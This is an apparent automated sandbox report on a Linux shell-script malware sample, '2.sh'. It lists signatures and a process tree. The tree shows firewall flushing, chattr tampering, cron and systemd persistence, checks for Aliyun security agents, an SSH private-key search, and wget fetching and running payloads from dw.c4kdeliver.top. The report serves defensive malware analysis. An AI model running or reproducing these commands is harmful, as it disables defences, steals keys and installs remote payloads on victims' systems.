Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
127s -
max time network
133s -
platform
linux_amd64 -
resource
ubuntu1804-amd64-en-20211208 -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
02/10/2023, 07:19
Static task
static1
Behavioral task
behavioral1
Sample
2.sh
Resource
ubuntu1804-amd64-en-20211208
Behavioral task
behavioral2
Sample
2.sh
Resource
debian9-armhf-20230831-en
Behavioral task
behavioral3
Sample
2.sh
Resource
debian9-mipsbe-20230831-en
Behavioral task
behavioral4
Sample
2.sh
Resource
debian9-mipsel-20230831-en
General
-
Target
2.sh
-
Size
18KB
-
MD5
77e3046e6271f2871ed34497a06ce770
-
SHA1
b0a6bd77c3371ff4be33ba5070aa486204853b0b
-
SHA256
cda6a3a92d746c0be30c1809c15b2f5e344b724dcecbda7729234a798fb5218b
-
SHA512
49072c85b82cd494a7fa55172bc4f012b4f63e096d075cd8ec15aa8f037443408ce516e885f1c54cf65ee617a807adaf2634d3508017a790be40012ba819c7b5
-
SSDEEP
192:7jQ04oGAuVvZ7U3voFUzcF1pNbHqbbA8g5ugdjqDWThOAaI1cnUeGy3K1ywOK:7jpmVCYUw3MbA5WS09QuUeGyJTK
Malware Config
Signatures
-
Modifies the dynamic linker configuration file 1 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload 2.sh -
Changes its process name 1 IoCs
description ioc pid Changes the process name, possibly in an attempt to hide itself (sysv-install) 1123 -
Flushes firewall rules 2 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 587 ufw 766 iptables -
ioc pid Process /lib/modules/4.15.0-161-generic/kernel/net/ipv6/netfilter/ip6_tables.ko 595 modprobe -
Attempts to change immutable files 17 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 788 chattr 1473 chattr 1467 chattr 1478 chattr 787 chattr 1445 chattr 1123 systemd-sysv-install 1471 chattr 1475 chattr 1519 chattr 1562 chattr 1648 chattr 767 chattr 770 grep 1606 chattr 772 grep 1469 chattr -
Creates/modifies Cron job 1 TTPs 7 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.gOvqGm crontab File opened for modification /etc/cron.d/root 2.sh File opened for modification /etc/cron.d/apache 2.sh File opened for modification /etc/cron.d/nginx 2.sh File opened for modification /var/spool/cron/root 2.sh File opened for modification /var/spool/cron/crontabs/root 2.sh File opened for modification /etc/cron.hourly/oanacroner 2.sh -
Creates/modifies environment variables 1 TTPs 2 IoCs
Creating/modifying environment variables is a common persistence mechanism.
description ioc Process File opened for modification /root/.bash_profile 2.sh File opened for modification /root/.bashrc 2.sh -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc File opened for modification /etc/init.d/linux-d -
Modifies rc script 1 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
description ioc Process File opened for modification /etc/rc.local 2.sh -
Modifies systemd 1 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc File opened for modification /etc/systemd/system/linux-d.service -
Reads CPU attributes 1 TTPs 2 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps -
Writes file to system bin folder 1 TTPs 1 IoCs
description ioc File opened for modification /bin/sysdown -
Modifies Bash startup script 1 TTPs 2 IoCs
description ioc Process File opened for modification /root/.bash_profile 2.sh File opened for modification /root/.bashrc 2.sh -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/module/ip6_tables/initstate modprobe File opened for reading /sys/module/x_tables/initstate modprobe -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/333/stat ps File opened for reading /proc/163/status ps File opened for reading /proc/18/status ps File opened for reading /proc/193/cmdline ps File opened for reading /proc/770/cmdline ps File opened for reading /proc/12/cmdline ps File opened for reading /proc/26/status ps File opened for reading /proc/115/status ps File opened for reading /proc/578/cmdline ps File opened for reading /proc/9/stat ps File opened for reading /proc/81/status ps File opened for reading /proc/163/status ps File opened for reading /proc/458/stat ps File opened for reading /proc/458/status ps File opened for reading /proc/self/mountinfo mount File opened for reading /proc/85/status ps File opened for reading /proc/589/cmdline ps File opened for reading /proc/11/stat ps File opened for reading /proc/98/cmdline ps File opened for reading /proc/17/cmdline ps File opened for reading /proc/34/stat ps File opened for reading /proc/193/stat ps File opened for reading /proc/252/stat ps File opened for reading /proc/sys/kernel/osrelease systemctl File opened for reading /proc/21/status ps File opened for reading /proc/159/stat ps File opened for reading /proc/13/cmdline ps File opened for reading /proc/447/status ps File opened for reading /proc/7/status ps File opened for reading /proc/158/cmdline ps File opened for reading /proc/155/cmdline ps File opened for reading /proc/cmdline systemctl File opened for reading /proc/16/status ps File opened for reading /proc/1/stat ps File opened for reading /proc/129/stat ps File opened for reading /proc/15/status ps File opened for reading /proc/420/cmdline ps File opened for reading /proc/19/stat ps File opened for reading /proc/31/stat ps File opened for reading /proc/772/stat ps File opened for reading /proc/3/cmdline ps File opened for reading /proc/771/status ps File opened for reading /proc/418/status ps File opened for reading /proc/369/status ps File opened for reading /proc/369/stat ps File opened for reading /proc/sys/kernel/osrelease ps File opened for reading /proc/21/status ps File opened for reading /proc/36/stat ps File opened for reading /proc/26/stat ps File opened for reading /proc/89/cmdline ps File opened for reading /proc/166/cmdline ps File opened for reading /proc/416/cmdline ps File opened for reading /proc/21/stat ps File opened for reading /proc/352/status ps File opened for reading /proc/30/stat ps File opened for reading /proc/12/stat ps File opened for reading /proc/289/status ps File opened for reading /proc/tty/drivers ps File opened for reading /proc/369/stat ps File opened for reading /proc/167/status ps File opened for reading /proc/4/stat ps File opened for reading /proc/8/status ps File opened for reading /proc/82/status ps File opened for reading /proc/5/stat ps -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/-bash wget File opened for modification /tmp/-python wget File opened for modification /tmp/.bashirc -python
Processes
-
/tmp/2.sh/tmp/2.sh1⤵
- Modifies the dynamic linker configuration file
- Creates/modifies Cron job
- Creates/modifies environment variables
- Modifies rc script
- Modifies Bash startup script
PID:580 -
/bin/mkdirmkdir -p /tmp /var/tmp2⤵PID:581
-
-
/bin/chmodchmod 1777 /tmp /var/tmp2⤵PID:582
-
-
/sbin/sysctlsysctl -w "fs.file-max=500000"2⤵PID:584
-
-
/bin/mountmount -o "remount,exec" /tmp2⤵PID:585
-
-
/bin/mountmount -o "remount,exec" /var/tmp2⤵
- Reads runtime system information
PID:586
-
-
/usr/sbin/ufwufw disable2⤵
- Flushes firewall rules
PID:587 -
/sbin/iptables/sbin/iptables -V3⤵PID:588
-
-
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop3⤵PID:593
-
/sbin/ip6tablesip6tables -L INPUT -n4⤵PID:594
-
/sbin/modprobe/sbin/modprobe ip6_tables5⤵
- Loads a kernel module
- Enumerates kernel/hardware configuration
PID:595
-
-
-
/sbin/iptablesiptables -F ufw-logging-deny4⤵PID:599
-
-
/sbin/iptablesiptables -F ufw-logging-allow4⤵PID:602
-
-
/sbin/iptablesiptables -F ufw-not-local4⤵PID:603
-
-
/sbin/iptablesiptables -F ufw-user-logging-input4⤵PID:604
-
-
/sbin/iptablesiptables -F ufw-user-limit-accept4⤵PID:605
-
-
/sbin/iptablesiptables -F ufw-user-limit4⤵PID:606
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-input4⤵PID:607
-
-
/sbin/iptablesiptables -F ufw-reject-input4⤵PID:608
-
-
/sbin/iptablesiptables -F ufw-after-logging-input4⤵PID:609
-
-
/sbin/iptablesiptables -F ufw-after-input4⤵PID:610
-
-
/sbin/iptablesiptables -F ufw-user-input4⤵PID:611
-
-
/sbin/iptablesiptables -F ufw-before-input4⤵PID:612
-
-
/sbin/iptablesiptables -F ufw-before-logging-input4⤵PID:613
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-forward4⤵PID:614
-
-
/sbin/iptablesiptables -F ufw-reject-forward4⤵PID:615
-
-
/sbin/iptablesiptables -F ufw-after-logging-forward4⤵PID:616
-
-
/sbin/iptablesiptables -F ufw-after-forward4⤵PID:617
-
-
/sbin/iptablesiptables -F ufw-user-logging-forward4⤵PID:618
-
-
/sbin/iptablesiptables -F ufw-user-forward4⤵PID:619
-
-
/sbin/iptablesiptables -F ufw-before-forward4⤵PID:620
-
-
/sbin/iptablesiptables -F ufw-before-logging-forward4⤵PID:621
-
-
/sbin/iptablesiptables -F ufw-track-forward4⤵PID:622
-
-
/sbin/iptablesiptables -F ufw-track-output4⤵PID:623
-
-
/sbin/iptablesiptables -F ufw-track-input4⤵PID:624
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-output4⤵PID:625
-
-
/sbin/iptablesiptables -F ufw-reject-output4⤵PID:626
-
-
/sbin/iptablesiptables -F ufw-after-logging-output4⤵PID:627
-
-
/sbin/iptablesiptables -F ufw-after-output4⤵PID:628
-
-
/sbin/iptablesiptables -F ufw-user-logging-output4⤵PID:629
-
-
/sbin/iptablesiptables -F ufw-user-output4⤵PID:630
-
-
/sbin/iptablesiptables -F ufw-before-output4⤵PID:631
-
-
/sbin/iptablesiptables -F ufw-before-logging-output4⤵PID:632
-
-
/sbin/iptablesiptables -Z ufw-logging-deny4⤵PID:633
-
-
/sbin/iptablesiptables -Z ufw-logging-allow4⤵PID:634
-
-
/sbin/iptablesiptables -Z ufw-not-local4⤵PID:635
-
-
/sbin/iptablesiptables -Z ufw-user-logging-input4⤵PID:636
-
-
/sbin/iptablesiptables -Z ufw-user-limit-accept4⤵PID:637
-
-
/sbin/iptablesiptables -Z ufw-user-limit4⤵PID:638
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-input4⤵PID:639
-
-
/sbin/iptablesiptables -Z ufw-reject-input4⤵PID:640
-
-
/sbin/iptablesiptables -Z ufw-after-logging-input4⤵PID:641
-
-
/sbin/iptablesiptables -Z ufw-after-input4⤵PID:642
-
-
/sbin/iptablesiptables -Z ufw-user-input4⤵PID:643
-
-
/sbin/iptablesiptables -Z ufw-before-input4⤵PID:644
-
-
/sbin/iptablesiptables -Z ufw-before-logging-input4⤵PID:645
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward4⤵PID:646
-
-
/sbin/iptablesiptables -Z ufw-reject-forward4⤵PID:647
-
-
/sbin/iptablesiptables -Z ufw-after-logging-forward4⤵PID:648
-
-
/sbin/iptablesiptables -Z ufw-after-forward4⤵PID:649
-
-
/sbin/iptablesiptables -Z ufw-user-logging-forward4⤵PID:650
-
-
/sbin/iptablesiptables -Z ufw-user-forward4⤵PID:651
-
-
/sbin/iptablesiptables -Z ufw-before-forward4⤵PID:652
-
-
/sbin/iptablesiptables -Z ufw-before-logging-forward4⤵PID:653
-
-
/sbin/iptablesiptables -Z ufw-track-forward4⤵PID:654
-
-
/sbin/iptablesiptables -Z ufw-track-output4⤵PID:655
-
-
/sbin/iptablesiptables -Z ufw-track-input4⤵PID:656
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-output4⤵PID:657
-
-
/sbin/iptablesiptables -Z ufw-reject-output4⤵PID:658
-
-
/sbin/iptablesiptables -Z ufw-after-logging-output4⤵PID:659
-
-
/sbin/iptablesiptables -Z ufw-after-output4⤵PID:660
-
-
/sbin/iptablesiptables -Z ufw-user-logging-output4⤵PID:661
-
-
/sbin/iptablesiptables -Z ufw-user-output4⤵PID:662
-
-
/sbin/iptablesiptables -Z ufw-before-output4⤵PID:663
-
-
/sbin/iptablesiptables -Z ufw-before-logging-output4⤵PID:664
-
-
/sbin/iptablesiptables -X ufw-logging-deny4⤵PID:665
-
-
/sbin/iptablesiptables -X ufw-logging-allow4⤵PID:666
-
-
/sbin/iptablesiptables -X ufw-not-local4⤵PID:667
-
-
/sbin/iptablesiptables -X ufw-user-logging-input4⤵PID:668
-
-
/sbin/iptablesiptables -X ufw-user-logging-output4⤵PID:669
-
-
/sbin/iptablesiptables -X ufw-user-logging-forward4⤵PID:670
-
-
/sbin/iptablesiptables -X ufw-user-limit-accept4⤵PID:671
-
-
/sbin/iptablesiptables -X ufw-user-limit4⤵PID:672
-
-
/sbin/iptablesiptables -X ufw-user-input4⤵PID:673
-
-
/sbin/iptablesiptables -X ufw-user-forward4⤵PID:674
-
-
/sbin/iptablesiptables -X ufw-user-output4⤵PID:675
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-input4⤵PID:676
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-output4⤵PID:677
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-forward4⤵PID:678
-
-
/sbin/iptablesiptables -P INPUT ACCEPT4⤵PID:679
-
-
/sbin/iptablesiptables -P OUTPUT ACCEPT4⤵PID:680
-
-
/sbin/iptablesiptables -P FORWARD ACCEPT4⤵PID:681
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-deny4⤵PID:682
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-allow4⤵PID:683
-
-
/sbin/ip6tablesip6tables -F ufw6-not-local4⤵PID:684
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-input4⤵PID:685
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept4⤵PID:686
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit4⤵PID:687
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input4⤵PID:688
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-input4⤵PID:689
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-input4⤵PID:690
-
-
/sbin/ip6tablesip6tables -F ufw6-after-input4⤵PID:691
-
-
/sbin/ip6tablesip6tables -F ufw6-user-input4⤵PID:692
-
-
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵PID:693
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵PID:694
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵PID:695
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵PID:696
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵PID:697
-
-
/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵PID:698
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵PID:699
-
-
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵PID:700
-
-
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵PID:701
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵PID:702
-
-
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵PID:703
-
-
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵PID:704
-
-
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵PID:705
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵PID:706
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵PID:707
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵PID:708
-
-
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵PID:709
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵PID:710
-
-
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵PID:711
-
-
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵PID:712
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵PID:713
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵PID:714
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵PID:715
-
-
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵PID:716
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵PID:717
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵PID:718
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵PID:719
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵PID:720
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵PID:721
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵PID:722
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵PID:723
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵PID:724
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵PID:725
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵PID:726
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵PID:727
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵PID:728
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵PID:729
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵PID:730
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵PID:731
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵PID:732
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵PID:733
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵PID:734
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵PID:735
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵PID:736
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵PID:737
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵PID:738
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵PID:739
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵PID:740
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵PID:741
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵PID:742
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵PID:743
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵PID:744
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵PID:745
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵PID:746
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵PID:747
-
-
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵PID:748
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵PID:749
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵PID:750
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵PID:751
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵PID:752
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵PID:753
-
-
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵PID:754
-
-
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵PID:755
-
-
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵PID:756
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵PID:757
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵PID:758
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵PID:759
-
-
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵PID:760
-
-
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵PID:761
-
-
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵PID:762
-
-
-
-
/sbin/iptablesiptables -P INPUT ACCEPT2⤵PID:763
-
-
/sbin/iptablesiptables -P OUTPUT ACCEPT2⤵PID:764
-
-
/sbin/iptablesiptables -P FORWARD ACCEPT2⤵PID:765
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:766
-
-
/usr/bin/chattrchattr -ia /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:767
-
-
/usr/bin/idid -u2⤵PID:768
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:769
-
-
/bin/grepgrep -i "[a]liyun"2⤵
- Attempts to change immutable files
PID:770
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:771
-
-
/bin/grepgrep -i "[y]unjing"2⤵
- Attempts to change immutable files
PID:772
-
-
/bin/unameuname -m2⤵PID:777
-
-
/usr/bin/base64base64 -d2⤵PID:779
-
-
/usr/bin/base64base64 -d2⤵PID:781
-
-
/usr/bin/base64base64 -d2⤵PID:783
-
-
/bin/chmodchmod +x /etc/init.d/linux-d2⤵PID:784
-
-
/bin/chmodchmod +x /bin/sysdown2⤵PID:785
-
-
/bin/chmodchmod +x /etc/systemd/system/linux-d.service2⤵PID:786
-
-
/usr/bin/chattrchattr +ia /etc/systemd/system/linux-d.service2⤵
- Attempts to change immutable files
PID:787
-
-
/usr/bin/chattrchattr +ia /etc/init.d/linux-d2⤵
- Attempts to change immutable files
PID:788
-
-
/bin/systemctlsystemctl start linux-d2⤵PID:789
-
-
/bin/systemctlsystemctl enable linux-d2⤵PID:1119
-
/lib/systemd/systemd-sysv-install/lib/systemd/systemd-sysv-install enable linux-d3⤵
- Attempts to change immutable files
PID:1123 -
/usr/bin/getoptgetopt -o r: --long root: -- enable linux-d4⤵PID:1125
-
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d linux-d defaults4⤵PID:1126
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:1138
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:1138
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:1138
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:1138
-
-
/sbin/systemctlsystemctl daemon-reload5⤵PID:1138
-
-
/bin/systemctlsystemctl daemon-reload5⤵PID:1138
-
-
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d linux-d enable4⤵PID:1191
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:1194
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:1194
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:1194
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:1194
-
-
/sbin/systemctlsystemctl daemon-reload5⤵PID:1194
-
-
/bin/systemctlsystemctl daemon-reload5⤵
- Reads runtime system information
PID:1194
-
-
-
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner12⤵
- Attempts to change immutable files
PID:1445
-
-
/usr/bin/crontabcrontab -r2⤵PID:1446
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1448
-
-
/bin/chmodchmod +x /etc/cron.d/root2⤵PID:1464
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/root2⤵
- Attempts to change immutable files
PID:1467
-
-
/bin/chmodchmod +x /etc/cron.d/apache2⤵PID:1468
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/apache2⤵
- Attempts to change immutable files
PID:1469
-
-
/bin/chmodchmod +x /etc/cron.d/nginx2⤵PID:1470
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/nginx2⤵
- Attempts to change immutable files
PID:1471
-
-
/bin/chmodchmod +x /var/spool/cron/root2⤵PID:1472
-
-
/usr/bin/chattrchattr +ia /var/spool/cron/root2⤵
- Attempts to change immutable files
PID:1473
-
-
/bin/chmodchmod +x /etc/cron.hourly/oanacroner2⤵PID:1474
-
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/oanacroner2⤵
- Attempts to change immutable files
PID:1475
-
-
/usr/bin/chattrchattr +ai -V /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner12⤵
- Attempts to change immutable files
PID:1478
-
-
/bin/unameuname -m2⤵PID:1483
-
-
/bin/unameuname -m2⤵PID:1514
-
-
/usr/bin/chattrchattr -ia /tmp/-bash2⤵
- Attempts to change immutable files
PID:1519
-
-
/usr/bin/wgetwget --no-check-certificate -q -O /tmp/-bash http://dw.c4kdeliver.top/x86_642⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/chmodchmod +x /tmp/-bash2⤵PID:1561
-
-
/usr/bin/chattrchattr +ia /tmp/-bash2⤵
- Attempts to change immutable files
PID:1562
-
-
/bin/chmodchmod +x /tmp/-bash2⤵PID:1563
-
-
/tmp/-bash/tmp/-bash -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d2⤵PID:1564
-
-
/tmp/-bash/tmp/-bash -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d -pwn2⤵PID:1565
-
-
/bin/rmrm -rf /tmp/-bash2⤵PID:1568
-
-
/bin/unameuname -m2⤵PID:1572
-
-
/bin/unameuname -m2⤵PID:1604
-
-
/usr/bin/chattrchattr -ia /tmp/-python2⤵
- Attempts to change immutable files
PID:1606
-
-
/usr/bin/wgetwget --no-check-certificate -q -O /tmp/-python http://dw.c4kdeliver.top/bashirc.x86_642⤵
- Writes file to tmp directory
PID:1611
-
-
/bin/chmodchmod +x /tmp/-python2⤵PID:1643
-
-
/usr/bin/chattrchattr +ia /tmp/-python2⤵
- Attempts to change immutable files
PID:1648
-
-
/bin/chmodchmod +x /tmp/-python2⤵PID:1651
-
-
/tmp/-python/tmp/-python2⤵
- Writes file to tmp directory
PID:1652
-
-
/bin/rmrm -rf /tmp/-python2⤵PID:1653
-
-
/bin/pingping -c 1 dw.c4kdeliver.top1⤵PID:774
-
/bin/grepgrep "bytes of data"1⤵PID:775
-
/usr/bin/wcwc -l1⤵PID:776
-
/bin/grepgrep -e 89.185.85.102 -e 167.71.233.111⤵PID:1493
-
/bin/grepgrep ESTAB1⤵PID:1495
-
/usr/bin/sortsort1⤵PID:1502
-
/usr/bin/uniquniq1⤵PID:1506
-
/usr/bin/wcwc -l1⤵PID:1510
-
/bin/grepgrep -e 51.255.171.231⤵PID:1576
-
/bin/grepgrep ESTAB1⤵PID:1579
-
/usr/bin/uniquniq1⤵PID:1588
-
/usr/bin/sortsort1⤵PID:1586
-
/usr/bin/wcwc -l1⤵PID:1595
-
/usr/bin/findfind /root/ /root /home -maxdepth 2 -name "id_rsa*"1⤵PID:1655
-
/bin/grepgrep -vw pub1⤵PID:1656
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
596B
MD5d7f7aaf9f798916b6a9c195a9858f465
SHA16c4b169a697def201c0386e277cd71af55e9c0a9
SHA256d572f7cac611d9597d663b3510e640391271034d07a0842c81c34c0ace9fd3a7
SHA5122ff253e65134c120668445d6ca9a18b78b18d02869c0cafa07133d6c6d2351a3ee83950176f8973379807108f74997b273afa16d34e9867b79dbdd33af944afe
-
Filesize
1KB
MD5bb962de4ec5f63841f3858020f33564d
SHA12df4090fe665cacc39a851a2e6fe9576f36e4854
SHA256b1b7adf45ddbdeeedf88d633ddd51bda642c020af4a00c4c8864ca6de6054f7c
SHA512672c648da1c8dcd1f285490cd72a2d45c2d94e31a8aed8bb3f96addbb8d874ccd4a2e6761228cabdeef980943ba71991f27eedfa17a5007ce7c2c77390b6d40f
-
Filesize
329B
MD54d396082544188076ae558f1d9cf2c99
SHA13b557b402ba836031b7a1305c17391faf240e2a2
SHA25690804fbd30eaedb6bf1ac6fb890049d785dfa7246c0cdfffc4ac5645cfe80d6a
SHA512a295944c3e8e0b2a5e8accd17a95ef413a328f5973cf32006e8f76130f01cea9bf969cb5b95dd307fefdb862d04844f8782155560402a9d43b99926fa83a7203
-
Filesize
1KB
MD52d666208e442c0c2834e9caf3b40f219
SHA12509c08d64a8714b3661dbbaa8338a9b8ee38eac
SHA256132aaffbfdd6e5e11c74d9c28ffcfc694086a9afc950b30b842e4e0a871fb774
SHA51278feb3880fbe6e4e741c01131baecdd26ac891ab67735b44395ccf2e1515a042a9d98c3333383406610fc7c17632c083195d89ac401a9c3cc9036b4dbce90b86
-
Filesize
1KB
MD5c3356096aee2d76de4551c7944d46a40
SHA12ef236e047f0ecce8eb674adebe024da417f4f8b
SHA256a49221256c08e150634fcd300fea85dc5376f60dd07deea259e09209e952543d
SHA5121cfbcdb9d5dcf23c0070ed6bb69320fd7dff42dd90254110bd8ad3d31e4541a3a1cd16e8b67af3b621ed8556ad1be36a9977cb85c10738d2c9c48d26c9370f4f